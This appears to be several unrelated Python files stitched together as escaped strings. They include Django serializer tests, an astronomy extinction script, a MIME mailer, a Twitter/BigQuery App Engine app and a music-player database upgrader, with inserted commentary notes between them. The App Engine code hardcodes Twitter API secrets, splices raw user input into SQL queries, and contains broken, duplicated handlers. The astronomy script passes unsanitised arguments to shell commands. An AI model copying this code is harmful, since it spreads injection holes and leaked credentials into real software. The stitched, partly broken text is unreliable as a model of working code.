serializers.serialize(format, [obj], indent=2, fields=(\'field1\',\'field3\'))\n result = next(serializers.deserialize(format, serialized_data))\n\n # Check that the deserialized object contains data in only the serialized fields.\n self.assertEqual(result.object.field1, \'first\')\n self.assertEqual(result.object.field2, \'\')\n self.assertEqual(result.object.field3, \'third\')\n\ndef streamTest(format, self):\n obj = ComplexModel(field1=\'first\',field2=\'second\',field3=\'third\')\n obj.save_base(raw=True)\n\n # Serialize the test database to a stream\n for stream in (six.StringIO(), HttpResponse()):\n serializers.serialize(format, [obj], indent=2, stream=stream)\n\n # Serialize normally for a comparison\n string_data = serializers.serialize(format, [obj], indent=2)\n\n # Check that the two are the same\n if isinstance(stream, 
six.StringIO):\n self.assertEqual(string_data, stream.getvalue())\n else:\n self.assertEqual(string_data, stream.content.decode(\'utf-8\'))\n\nfor format in serializers.get_serializer_formats():\n setattr(SerializerTests, \'test_\' + format + \'_serializer\', curry(serializerTest, format))\n setattr(SerializerTests, \'test_\' + format + \'_natural_key_serializer\', curry(naturalKeySerializerTest, format))\n setattr(SerializerTests, \'test_\' + format + \'_serializer_fields\', curry(fieldsTest, format))\n if format != \'python\':\n setattr(SerializerTests, \'test_\' + format + \'_serializer_stream\', curry(streamTest, format))\n\n\nclass XmlDeserializerSecurityTests(TestCase):\n\n def test_no_dtd(self):\n """"""\n The XML deserializer shouldn\'t allow a DTD.\n\n This is the most straightforward way to prevent all entity definitions\n and avoid both external entities and entity-expansion attacks.\n\n """"""\n xml = \'\'\n with self.assertRaises(DTDForbidden):\n next(serializers.deserialize(\'xml\', xml))\n', 'import threading\n\ndef ebv_list(list_submit,list_dict,i,ppid): \n\timport os\n\tlineindex = 0\n timehold = time.time()\n\tlist_out = []\n\n\tout = open(\'/tmp/tmpf_\' + str(i) + \'_\' + str(ppid),\'w\')\n for line in list_submit:\n\t\ttt = re.split(\'\\s+\',line)\n \tra = float(tt[0])\n \tdec = float(tt[1])\n \tEBV = calc_EBV(float(ra),float(dec),i)\n\t\tlist_out.append(EBV)\n\t\t#print EBV\n\t\tlineindex += 1\n\t\tout.write(str(EBV) + \'\\n\')\n \tif lineindex % 100 == 0: \n \t\tprint \'thread \' + str(i), lineindex, len(list_submit), time.time() - timehold\n \t\ttimehold = time.time()\n\tlist_dict[str(i)][\'list_out\'] = list_out\n\tout.close()\n\ndef calc_EBV(coord_in_ra,coord_in_dec,i):\n\t\n\t#coord_in_ra=\'12:51:26.28\'\n #coord_in_dec=\'27:07:42.\'\n coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch=\'2000\') # input needs to be in HOURS as a STRING\n g = Galactic(coord, epoch=\'2000\') # output is in degrees not hours--it\'s latitude/longitude\n \n spt = re.split(\'\\:\',str(g.lat))\n #print spt, abs(float(spt[0])), float(spt[1])/60.\n gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )\n #print gallat\n #print g.long\n spt = re.split(\'\\:\',str(g.long))\n #print spt\n gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. 
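# Note: the setattr(...) loop above generates one test method per registered format
# from a single parametrised body; Django's `curry` returns a plain function, which
# is why the bodies take `(format, self)`. A framework-free sketch of the same
# pattern with stand-in encoders instead of Django serializers (with functools,
# `partialmethod` is needed so `self` still gets bound on attribute access):

import json
import pickle
import unittest
from functools import partialmethod

ENCODERS = {'json': json.dumps, 'pickle': pickle.dumps}
DECODERS = {'json': json.loads, 'pickle': pickle.loads}

def roundtrip_body(self, fmt):
    # one parametrised body, shared by every generated test method
    data = {'id': 1, 'name': 'anchor'}
    self.assertEqual(DECODERS[fmt](ENCODERS[fmt](data)), data)

class RoundtripTests(unittest.TestCase):
    pass

for fmt in ENCODERS:
    setattr(RoundtripTests, 'test_%s_roundtrip' % fmt,
            partialmethod(roundtrip_body, fmt))

if __name__ == '__main__':
    unittest.main()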
)\n #print gallong\n \n #coordtest = Equatorial(Galactic(g.long,g.lat, epoch=\'2000\'), epoch=\'2000\')\n \n output = commands.getoutput(\'dust_getval \' + str(gallong) + \' \' + str(gallat) + \' interp=y PI:KEY\' + str(i) ) \n spt = re.split(\'\\s\',output)\n\t#print spt\n EBV = spt[-1]\n\t#print EBV, float(coord_in_ra), float(coord_in_dec)\n\treturn EBV\n\nclass MyThread ( threading.Thread ):\n\tdef __init__ ( self, list_submit,list_dict, i, ppid):\n\t\tself.i = i\n\t\tself.list_submit = list_submit \n\t\tself.list_dict = list_dict\n\t\tself.ppid = ppid\n\t\tthreading.Thread.__init__(self)\t\n\n\tdef run ( self ):\n\t\tebv_list(self.list_submit,list_dict,self.i,self.ppid)\n\t return \n\n#add E(B-V) to ldac table\nimport re, commands, sys, bashreader, os\nfrom ephem import *\n\ndict = bashreader.parseFile(\'progs.ini\')\n\ntable = sys.argv[1]\n\nimport time\ntempfile = \'/tmp/outkey\'\nebvfile = \'/tmp/outebv\'\nos.system(\'rm \' + ebvfile)\nppid = os.getppid()\nprint ppid\ncommand = ""ldactoasc -b -i "" + table + "" -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > "" + ebvfile \nprint command\nos.system(command)\nlist = []\nimport re\noutkey=open(tempfile,\'w\')\nlines = open(ebvfile,\'r\').readlines()\nnumber_interval = 4\nlength_int = len(lines)/number_interval\nstart = 0\nmy_threads = []\nlist_dict = {}\nfor i in range(number_interval):\n\tend = start + length_int\n\tif i + 1 == number_interval:\n\t\tlist_submit = lines[start:]\n\telse:\n\t\tlist_submit = lines[start:end]\n\tstart = end\n\tlist_dict[str(i)] = {\'list_submit\':list_submit}\n\t#s = MyThread(list_submit,list_dict,i,ppid)\n\n\t#stat = os.fork()\n\tprint i, \'started\'\n\ts = os.fork()\n\tif not s:\n\t\tebv_list(list_submit,list_dict,i,ppid)\n\t\tsys.exit()\n\t#s.start()\t\n\tmy_threads.append(s)\n\nprint my_threads\n#print threading.enumerate()\nfor s in my_threads: \n \tos.waitpid(s,0)\n\nprint \'done\'\n\nlist_out = []\nfor i in range(number_interval):\n\tlist_out = list_out + list_dict[str(i)][\'list_out\']\n\nprint len(lines), len(list_out)\nprint lines[0:2], list_out[0:2]\n\t\n\t\n\n\n\n# READ IN COLUMN INFO\n\n\n\n\n\n\n\n\n\n\n\nfor val in list_out:\n\toutkey.write(str(val) + \'\\n\')\n\n\noutkey.close()\n\ncommand = ""asctoldac -i "" + tempfile + "" -o "" + tempfile + "".cat -c "" + dict[\'photconf\'] + ""/EBV.conf -t OBJECTS ""\nos.system(command)\n\ncommand = ""ldacjoinkey -o test -i "" + table + "" -p "" + tempfile + "".cat -t OBJECTS -k EBV"" \nos.system(command)\n\n', '#coding=utf-8\n\nimport smtplib\nfrom datetime import datetime\nfrom hashlib import md5\nimport sys, re\nfrom .misc import *\nfrom .parts import *\n\nfrom collections import OrderedDict as odict\n\nclass Mimemail():\n \n def __init__(self, **kwargs):\n self.headers = odict()\n self.headers[\'MIME-Version\'] = \'1.0\'\n self.headers[\'From\'] = MM_DEFAULT_FROM\n self.headers[\'Date\'] = datetime.utcnow().strftime(\'%a, %d %b %Y %H:%M:%S GMT\')\n \n self.body = \'\'\n self.html = None\n self.text = None\n self.images = []\n self.attachments = []\n self.charset = \'UTF-8\'\n self.recipients = {}\n self.from_email = \'root@localhost\'\n self.kw = kwargs\n \n def set_from(self, from_email, from_name):\n self.headers[\'From\'] = \'%s <%s>\' % (encode_header(from_name, self.charset), from_email)\n self.from_email = from_email\n \n def set_html(self, html):\n self.html = html\n \n def set_text(self, text):\n self.text = text\n \n def add_image(self, image):\n self.images.append(image)\n \n def add_attachment(self, att):\n self.attachments.append(att)\n \n def 
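# Note: the EBV script above fans work out with os.fork(), but a forked child gets
# its own copy of `list_dict`, so the parent's later read of
# list_dict[str(i)]['list_out'] cannot see the children's results; only the /tmp
# files actually cross the process boundary. A hedged sketch of the same fan-out
# with multiprocessing, which does ship results back to the parent (`calc_EBV` is
# the per-coordinate lookup defined above; lines are assumed to be 'ra dec' pairs):

from multiprocessing import Pool

def ebv_for_line(line):
    tt = line.split()
    return calc_EBV(float(tt[0]), float(tt[1]), 0)

def parallel_ebv(lines, workers=4):
    pool = Pool(workers)
    try:
        # map() preserves input order, so results line up with `lines`
        return pool.map(ebv_for_line, lines)
    finally:
        pool.close()
        pool.join()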
set_subject(self, subject):\n self.subject = subject\n\n def create_images_part(self, boundary):\n lines = []\n for image in self.images:\n lines.extend([\n MM_DEFAULT_CRLF,\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF),\n image.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n image.get_part_body()\n ])\n \n return \'\'.join(lines)\n \n def create_attachments_part(self, boundary):\n lines = []\n for att in self.attachments:\n lines.extend([\n MM_DEFAULT_CRLF,\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF),\n att.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n att.get_part_body()\n ])\n \n return \'\'.join(lines)\n \n def build(self):\n has_html = self.html != None\n has_text = self.text != None\n has_img = len(self.images) > 0\n has_att = len(self.attachments) > 0\n \n if has_text and not has_html:\n self.html = MimemailPartHtml(re.sub(r\'\\n\', \'
    \', self.text.plain_content, re.M | re.S), charset = self.charset)\n elif has_html and not has_text:\n self.text = MimemailPartText(re.sub(r\'<|>|/\', \'\', self.html.plain_content, re.M | re.S | re.U), charset = self.charset)\n elif not has_html and not has_text and not has_att:\n raise MimemailException(\'An email has no content to send\')\n \n if has_img:\n for image in self.images:\n src = image.get_file_path()\n dst = \'cid:\' + image.get_image_cid()\n self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)\n \n boundary = \'alt_\' + gen_boundary_hash()\n self.headers[\'Content-Type\'] = \'multipart/alternative; boundary=""\' + boundary + \'""\'\n \n self.body = \'\'.join([\n \'--%s%s\' % ( boundary, MM_DEFAULT_CRLF ),\n self.text.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n self.text.get_part_body(),\n \'%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),\n self.html.get_part_header(),\n MM_DEFAULT_CRLF,\n MM_DEFAULT_CRLF,\n self.html.get_part_body(),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n \n if has_img:\n boundary = \'rel_\' + gen_boundary_hash()\n self.body = \'\'.join([\n \'--%s%s\' % ( boundary, MM_DEFAULT_CRLF ),\n \'Content-Type: %s%s%s\' % (self.headers[\'Content-Type\'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),\n self.body,\n self.create_images_part(boundary),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n self.headers[\'Content-Type\'] = \'multipart/related; boundary=""%s""\' % (boundary)\n \n if has_att:\n boundary = \'att_\' + gen_boundary_hash()\n self.body = \'\'.join([\n \'--%s%s\' % (boundary, MM_DEFAULT_CRLF ),\n \'Content-Type: %s%s%s\' % (self.headers[\'Content-Type\'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),\n self.body,\n self.create_attachments_part(boundary),\n \'%s--%s--%s%s\' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )\n ])\n self.headers[\'Content-Type\'] = \'multipart/mixed; boundary=""%s""\' % (boundary)\n \n self.headers[\'Message-ID\'] = self.gen_message_id()\n \n if hasattr(self, \'subject\'):\n self.headers[\'Subject\'] = encode_header(self.subject, self.charset)\n \n def gen_message_id(self):\n return \'<%s.%08x@%s>\' % (datetime.datetime.now().strftime(\'%Y%m%d%H%M%S\'), random.randint(0, sys.maxint), self.kw.get(\'host\', \'localhost\'))\n\n def add_recipient(self, email, name = None):\n self.recipients[email] = name if name else email\n\n def send(self):\n self.build()\n \n extra_headers = self.get_extra_headers()\n \n for email, name in self.recipients.iteritems():\n message = \'%s%sTo: %s <%s>%s%s%s\' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)\n s = smtplib.SMTP(self.kw.get(\'smtp_relay\', \'127.0.0.1\'))\n s.sendmail(self.from_email, email, message)\n s.quit()\n \n def get_extra_headers(self):\n return MM_DEFAULT_CRLF.join([ \'%s: %s\' % (k, v) for k,v in self.headers.iteritems() ])\n\n\n', '__author__ = dummy@email.com (J. 
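# Note: Mimemail assembles the multipart/alternative, multipart/related and
# multipart/mixed layers by hand, which means hand-managing boundaries and CRLFs.
# A minimal sketch of the same text+html nesting with the stdlib email package,
# which generates boundaries itself (function and argument names are illustrative):

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def build_message(text, html, subject, from_addr, to_addr):
    # text + html alternatives, wrapped in a mixed container so
    # attachments could be added alongside later
    alt = MIMEMultipart('alternative')
    alt.attach(MIMEText(text, 'plain', 'utf-8'))
    alt.attach(MIMEText(html, 'html', 'utf-8'))
    msg = MIMEMultipart('mixed')
    msg.attach(alt)
    msg['Subject'] = subject
    msg['From'] = from_addr
    msg['To'] = to_addr
    return msg.as_string()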
Matthew Landis)\'\n\n\nimport os\nimport logging\nimport pickle\nimport webapp2\nimport time\nimport httplib2\nimport json\nimport tweepy\nimport haigha\nfrom collections import Counter\nfrom haigha.connections.rabbit_connection import RabbitConnection\nfrom apiclient import discovery\nfrom oauth2client import appengine\nfrom oauth2client import client\nfrom google.appengine.api import memcache\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.webapp import template\n#######################################################################\n\nPROJECTID = \'934763316754\'\n\nCLIENT_SECRETS = os.path.join(os.path.dirname(__file__), \'client_secrets.json\')\n\n# Helpful message to display in the browser if the CLIENT_SECRETS file\n# is missing.\nMISSING_CLIENT_SECRETS_MESSAGE = """"""""""\n

Warning: Please configure OAuth 2.0\n\nTo make this sample run you will need to populate the client_secrets.json file\nfound at:\n\n%s.\n\nwith information found on the APIs Console.

    \n"""""" % CLIENT_SECRETS\n\nhttp = httplib2.Http(memcache)\nservice = discovery.build(""plus"", ""v1"", http=http)\nbigquery_service = discovery.build(""bigquery"",""v2"", http=http)\n\nconsumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B""\nconsumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG""\naccess_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7""\naccess_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG""\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\ndecorator = appengine.oauth2decorator_from_clientsecrets(\n CLIENT_SECRETS,\n scope=\'https://www.googleapis.com/auth/plus.me\',\n message=MISSING_CLIENT_SECRETS_MESSAGE)\n\nbq_decorator = appengine.oauth2decorator_from_clientsecrets(\n CLIENT_SECRETS,\n scope=\'https://www.googleapis.com/auth/bigquery\',\n message=MISSING_CLIENT_SECRETS_MESSAGE)\n\n## Function to retrieve and render a template\ndef render_template(handler, templatename, templatevalues):\n path = os.path.join(os.path.dirname(__file__), \'templates/\' + templatename)\n html = template.render(path, templatevalues)\n handler.response.out.write(html)\n\n#######################################################################\n## Handles and loads index page\nclass MainPage(webapp2.RequestHandler):\n\n def get(self):\n\t\tnickname = ""null""\n\t\temail = ""null""\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\tnickname = ui.fname+ "" "" +ui.lname\n\t\t\t\temail = user.email()\t\n\t\t\t\tlogin = users.create_login_url(\'/\')\n\t\t\telse:\n\t\t\t\tnickname = user.nickname()\n\t\t\t\temail = user.email()\n\t\t\t\tlogin = \'/createProfile\'\n\t\telse:\n\t\t\tui = None\n\t\t\tlogin = users.create_login_url(\'/\')\n\t\tlogout = users.create_logout_url(\'/\')\n\t\tos.system(""python stream.py"")\n\t\ttemplate_values = {\n\t\t\'login\': login,\n\t\t\'logout\': logout,\n\t\t\'user\': user,\n\t\t\'nickname\': nickname,\n\t\t\'email\': email\n\t\t}\n\t\trender_template(self, \'index.html\', template_values)\n\n#######################################################################\n## Handle user info and profile\nclass CreateProfile(webapp2.RequestHandler):\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tself.redirect(\'/profile\')\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'logout\':users.create_logout_url(\'/\'), \'nickname\': users.nickname()}\n\t\t\t\ttemplate_path = \'templates/createProfile.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(user.create_login_url(\'/\'))\n\n\n#######################################################################\n## process user profile\n## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page\nclass ProcessUser(webapp2.RequestHandler) :\n\n def post(self) :\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tfname = self.request.get(\'fname\')\n\t\t\tlname = self.request.get(\'lname\')\n\t\t\tfname.replace("" "", """")\n\t\t\tlname.replace("" "", """")\n\t\t\twords = self.request.get_all(\'word\')\n\t\t\tif (not(not fname)) & (not(not lname)):\n\t\t\t\tNewUser = UserModel()\n\t\t\t\tNewUser.uid = user.user_id()\n\t\t\t\tNewUser.fname = 
fname\n\t\t\t\tNewUser.lname = lname\n\t\t\t\tNewUser.words = []\n\t\t\t\tfor word in words:\n\t\t\t\t\tword.replace("" "", """")\n\t\t\t\t\tif word:\n\t\t\t\t\t\tNewUser.words+=[word]\n\t\t\t\tNewUser.put()\n\t\t\t\tself.redirect(\'/profile\')\n\t\t\telse:\n\t\t\t\tself.redirect(\'/createProfile\')\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n#######################################################################\n## Model Data\nclass DataHandler(webapp2.RequestHandler) :\n\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM \'\n\'[publicdata:samples.shakespeare] WHERE word=""\'+inputData+\'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n resp = []\n if \'rows\' in dataList:\n #parse dataList\n for row in dataList[\'rows\']:\n for key,dict_list in row.iteritems():\n count = dict_list[0]\n year = dict_list[1]\n corpus = dict_list[2]\n resp.append({\'count\': count[\'v\'],\'year\':year[\'v\'],\'corpus\':corpus[\'v\']})\n else:\n resp.append({\'count\':\'0\',\'year\':\'0\',\'corpus\':\'0\'})\n self.response.headers[\'Content-Type\'] = \'application/json\'\n self.response.out.write(json.dumps(resp))\n else:\n self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\t\t\t\n#######################################################################\n## Model Words\nclass WordsHandler(webapp2.RequestHandler) :\n\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT text FROM \'\n\'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""\'+inputData+\'""GROUP BY text ORDER BY text LIMIT 150\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n resp = {}\n resp[\'text\'] = status.text\n resp[\'created_at\'] = time.mktime(status.created_at.timetuple())\n resp[\'geo\'] = status.geo\n resp[\'source\'] = status.source\n self.response.headers[\'Content-Type\'] = \'application/json\'\n self.response.out.write(json.dumps(resp))\n else:\n self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\n#######################################################################\n## Model Words\nclass WordsHandler(webapp2.RequestHandler) :\n\n inputData = ""yes""\n @bq_decorator.oauth_aware\n def get(self) :\n if bq_decorator.has_credentials():\n http = bq_decorator.http()\n inputData = self.request.get(""inputData"")\n queryData = {\'query\':\'SELECT text FROM \'\n\'[doctor-know:rtda.tweets] WHERE text CONTAINS ""\'+inputData+\'"" GROUP BY text ORDER BY text LIMIT 300\'}\n tableData = bigquery_service.jobs()\n dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)\n\n tweets = []\n if \'rows\' in dataList:\n #parse dataList\n count = 0\n for row in dataList[\'rows\']:\n for key,dict_list in row.iteritems():\n tweet = dict_list[0]\n count += 1\n tweets.append({\'text\': tweet})\n if count == 300:\n break\n\n\n ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""]\n words = []\n for tweet in tweets:\n tt = tweet.get(\'text\', """")\n for word in tt.split():\n if ""http"" in word:\n continue\n if word not in 
ignore_words:\n words.append(word)\n\n resp = Counter(words)\n\n resp.headers.add(\'Access-Control-Allow-Origin\', ""*"")\n return resp\n\n # self.response.headers[\'Content-Type\'] = \'application/json\'\n # self.response.out.write(json.dumps(tweets))\n # else:\n # self.response.write(json.dumps({\'error\':\'No credentials\'}))\n\n\n#######################################################################\n## Profile Page\nclass ProfilePage(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'firstname\': ui.fname, \'lastname\': ui.lname, \'words\': ui.words, \'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/profile.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\tself.redirect(\'/createProfile\')\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n#######################################################################\n## Artificial Creativity Engine\nclass DisplayEngine(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/engine.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'nickname\': user.nickname(), \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/engine.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n\n#######################################################################\n## Data Analysis\nclass DisplayData(webapp2.RequestHandler) :\n\n def get(self):\n\t\tuser = users.get_current_user()\n\t\tif user:\n\t\t\tres = UserModel.query(UserModel.uid == user.user_id()).fetch()\n\t\t\tif res:\n\t\t\t\tui = res[0]\n\t\t\t\ttemplate_data = {\'nickname\': ui.fname+ "" "" +ui.lname, \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/data.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\t\telse:\n\t\t\t\ttemplate_data = {\'nickname\': user.nickname(), \'logout\': users.create_logout_url(\'/\')}\n\t\t\t\ttemplate_path = \'templates/data.html\'\n\t\t\t\tself.response.out.write(template.render(template_path,template_data))\n\t\telse:\n\t\t\tself.redirect(users.create_login_url(\'/\'))\n\n\n#######################################################################\n## Establish/Update User Profile\nclass UserModel(ndb.Model) :\n\tuid = ndb.StringProperty(indexed=True)\n\tfname = ndb.StringProperty(indexed = False)\n\tlname = ndb.StringProperty(indexed = False)\n\twords = ndb.StringProperty(indexed=False,repeated=True)\n\t\n#######################################################################\n## Establish/Update User Profile\n# class CustomStreamListener(tweepy.StreamListener):\n# def __init__(self, api):\n# self.api = api\n# super(tweepy.StreamListener, self).__init__()\n\n# #setup rabbitMQ Connection\n# self.connection = RabbitConnection(host=\'127.0.0.1\', heartbeat=None, debug=True)\n\n# self.channel = 
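# Note: both WordsHandler variants above splice `inputData` straight into the query
# text, which is a SQL-injection vector (and the first variant also references an
# undefined `status`). A hedged sketch of the same lookup with named query
# parameters via the v2 jobs().query request, reusing the service objects defined
# above (standard-SQL table syntax; field layout per the QueryRequest schema):

queryData = {
    'query': ('SELECT text FROM `doctor-know.rtda.tweets` '
              'WHERE STRPOS(text, @term) > 0 '
              'GROUP BY text ORDER BY text LIMIT 300'),
    'useLegacySql': False,
    'parameterMode': 'NAMED',
    'queryParameters': [{
        'name': 'term',
        'parameterType': {'type': 'STRING'},
        'parameterValue': {'value': inputData},
    }],
}
dataList = bigquery_service.jobs().query(
    projectId=PROJECTID, body=queryData).execute(http)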
self.connection.channel()\n\n# #set max queue size\n# args = {""x-max-length"": 2000}\n\n# self.channel.queue.declare(queue=\'twitter_topic_feed\', arguments=args)\n\n# def on_status(self, status):\n# print status.text, ""\\n""\n\n# data = {}\n# data[\'text\'] = status.text\n# data[\'created_at\'] = time.mktime(status.created_at.timetuple())\n# data[\'geo\'] = status.geo\n# data[\'source\'] = status.source\n\n# #queue the tweet\n# self.channel.basic.publish(exchange=\'\',\n# routing_key=\'twitter_topic_feed\',\n# body=json.dumps(data))\n\n# def on_error(self, status_code):\n# print >> sys.stderr, \'Encountered error with status code:\', status_code\n# return True # Don\'t kill the stream\n\n# def on_timeout(self):\n# print >> sys.stderr, \'Timeout...\'\n# return True # Don\'t kill the stream\n\n# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))\n# # my keyword today is chelsea as the team just had a big win\n# sapi.filter(track=[self.request.get(""inputData"")])\n\n\n#######################################################################\n## Establish/Update User Profile\n# class CustomStreamListener(tweepy.StreamListener):\n# def __init__(self, api):\n# self.api = api\n# super(tweepy.StreamListener, self).__init__()\n\n# #setup rabbitMQ Connection\n# self.connection = RabbitConnection(host=\'127.0.0.1\', heartbeat=None, debug=True)\n\n# self.channel = self.connection.channel()\n\n# #set max queue size\n# args = {""x-max-length"": 2000}\n\n# self.channel.queue.declare(queue=\'twitter_topic_feed\', arguments=args)\n\n# def on_status(self, status):\n# print status.text, ""\\n""\n\n# data = {}\n# data[\'text\'] = status.text\n# data[\'created_at\'] = time.mktime(status.created_at.timetuple())\n# data[\'geo\'] = status.geo\n# data[\'source\'] = status.source\n\n# #queue the tweet\n# self.channel.basic.publish(exchange=\'\',\n# routing_key=\'twitter_topic_feed\',\n# body=json.dumps(data))\n\n# def on_error(self, status_code):\n# print >> sys.stderr, \'Encountered error with status code:\', status_code\n# return True # Don\'t kill the stream\n\n# def on_timeout(self):\n# print >> sys.stderr, \'Timeout...\'\n# return True # Don\'t kill the stream\n\n# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))\n# # my keyword today is chelsea as the team just had a big win\n# sapi.filter(track=[self.request.get(""inputData"")])\n\napp = webapp2.WSGIApplication( [\n (\'/\', MainPage),\n (\'/profile\', ProfilePage),\n (\'/createProfile\', CreateProfile),\n (\'/userRegister\', ProcessUser),\n (\'/getData\', DataHandler),\n (\'/getWords\', WordsHandler),\n (\'/data\', DisplayData),\n (\'/engine\', DisplayEngine),\n (decorator.callback_path, decorator.callback_handler()),\n (bq_decorator.callback_path, bq_decorator.callback_handler())\n], debug=True)\n', '#!/usr/bin/python\n# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n\nfrom lollypop.sqlcursor import SqlCursor\n\n\nclass DatabaseUpgrade:\n """"""\n Manage database schema upgrades\n """"""\n\n def __init__(self, version, db):\n """"""\n Init object\n @param version as int\n @param db as Database\n """"""\n self._version = version\n self._db = db\n # Here are schema upgrade, key is database version,\n # value is sql request\n self._UPGRADES = {\n 1: ""update tracks set duration=CAST(duration as INTEGER);"",\n 2: ""update albums set artist_id=-2001 where artist_id=-999;""\n }\n\n """"""\n Return upgrade count\n @return int\n """"""\n def count(self):\n return len(self._UPGRADES)\n\n """"""\n Upgrade database based on version\n @return new db version as int\n """"""\n def do_db_upgrade(self):\n with SqlCursor(self._db) as sql:\n for i in range(self._version+1, len(self._UPGRADES)+1):\n try:\n sql.execute(self._UPGRADES[i])\n except Exception as e:\n print(""Database upgrade failed: "", e)\n sql.commit()\n return len(self._UPGRADES)\n', '# -*- coding: utf-8 -*-\n\n""""""Thread of structural synthesis.""""""\n\n__author__ = ""Yuan Chang""\n__copyright__ = ""Copyright (C) 2016-2021""\n__license__ = ""AGPL""\n__email__ = dummy@email.com""\n\nfrom typing import Sequence, Dict, List\nfrom qtpy.QtCore import Signal\nfrom qtpy.QtWidgets import QWidget, QTreeWidgetItem\nfrom pyslvs.graph import (\n link_synthesis,\n contracted_link_synthesis,\n contracted_graph,\n conventional_graph,\n Graph,\n)\nfrom pyslvs_ui.synthesis.thread import BaseThread\n\nAssortment = Sequence[int]\n\n\ndef assortment_eval(links_expr: str) -> Assortment:\n """"""Return link assortment from 